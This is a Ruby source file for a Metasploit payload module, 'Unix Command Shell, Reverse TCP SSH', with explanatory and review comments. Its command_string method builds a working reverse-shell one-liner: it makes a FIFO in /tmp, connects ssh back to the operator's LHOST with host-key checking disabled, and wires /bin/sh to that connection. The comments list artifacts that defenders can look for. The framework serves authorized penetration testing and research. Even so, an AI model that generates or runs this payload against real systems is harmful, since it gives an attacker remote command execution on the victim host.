
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/cmd/unix/reverse_ssh.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_ssh'
module MetasploitModule
  # The generated command embeds a random pipe name and operator-set options,
  # so the payload size is declared as dynamic rather than a fixed number.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  #
  # Registers the payload metadata and its advanced options.
  #
  # The payload is a 'cmd' payload for the 'unix' platform that needs an
  # `ssh` binary on the host where it runs ('RequiredCmd'). Its handler is
  # Msf::Handler::ReverseSsh and its session type is
  # Msf::Sessions::SshCommandShellReverse.
  #
  # Advanced options registered here:
  # * SshClientOptions - space separated `-o` settings for the ssh client.
  #   The default turns off host key checking and points the known-hosts
  #   file at /dev/null, so the client does not verify the server it
  #   connects to and records nothing about it.
  # * SSHPath   - ssh executable to invoke (default 'ssh').
  # * ShellPath - shell to execute (default '/bin/sh').
  #
  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'Unix Command Shell, Reverse TCP SSH',
      'Description' => 'Connect back and create a command shell via SSH',
      'Author' => [
        'RageLtMan <rageltman[at]sempervictus>', # Rex/Metasploit
        'hirura' # HrrRbSsh
      ],
      'License' => MSF_LICENSE,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Handler' => Msf::Handler::ReverseSsh,
      'Session' => Msf::Sessions::SshCommandShellReverse,
      'PayloadType' => 'cmd',
      'RequiredCmd' => 'ssh',
      'Payload' => { 'Offsets' => {}, 'Payload' => '' }
    ))

    client_options = Msf::OptString.new(
      'SshClientOptions',
      [false, "Space separated options for the ssh client", 'UserKnownHostsFile=/dev/null StrictHostKeyChecking=no']
    )
    ssh_path = OptString.new('SSHPath', [true, 'The path to the SSH executable', 'ssh'])
    shell_path = OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])

    register_advanced_options([client_options, ssh_path, shell_path])
  end

  #
  # Constructs the payload: whatever the parent class generates, followed by
  # the shell one-liner from #command_string.
  #
  def generate(_opts = {})
    super + command_string
  end

  #
  # Returns the command string to use for execution.
  #
  # The command, in order: creates a named pipe under /tmp whose name is a
  # random lowercase string (length range 4..8 passed to Rex::Text), starts
  # the ssh client in quiet mode (-qq) towards LHOST with its stdin fed from
  # the pipe, pipes the client's output into ShellPath, sends the shell's
  # stdout and stderr back into the pipe, and finally removes the pipe.
  #
  # Defender-relevant artifacts visible in this string: a short-lived FIFO
  # in /tmp with an all-lowercase name, an ssh process started with -qq and
  # (by default) `-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no`,
  # and a shell whose standard streams are wired to that ssh process.
  #
  # NOTE(review): every datastore value is interpolated unquoted, so
  # whitespace or shell metacharacters in SSHPath, ShellPath, LHOST or
  # SshClientOptions change the shape of the resulting command.
  #
  def command_string
    fifo_name = Rex::Text.rand_text_alpha_lower(4..8)

    # The port flag is omitted only when LPORT compares equal to Integer 22.
    # NOTE(review): presumably the datastore returns LPORT as an Integer;
    # if it were a String the flag would always be emitted - confirm.
    port_flag =
      if datastore['LPORT'] == 22
        ''
      else
        "-p #{datastore['LPORT']} "
      end

    # Each space separated setting becomes its own "-o <setting> " argument.
    client_flags =
      if datastore['SshClientOptions'].blank?
        ''
      else
        datastore['SshClientOptions'].split(' ').compact.map { |setting| "-o #{setting} " }.join
      end

    "mkfifo /tmp/#{fifo_name};#{datastore['SSHPath']} -qq #{client_flags}#{datastore['LHOST']} #{port_flag}0</tmp/#{fifo_name}|#{datastore['ShellPath']} >/tmp/#{fifo_name} 2>&1;rm /tmp/#{fifo_name}"
  end
end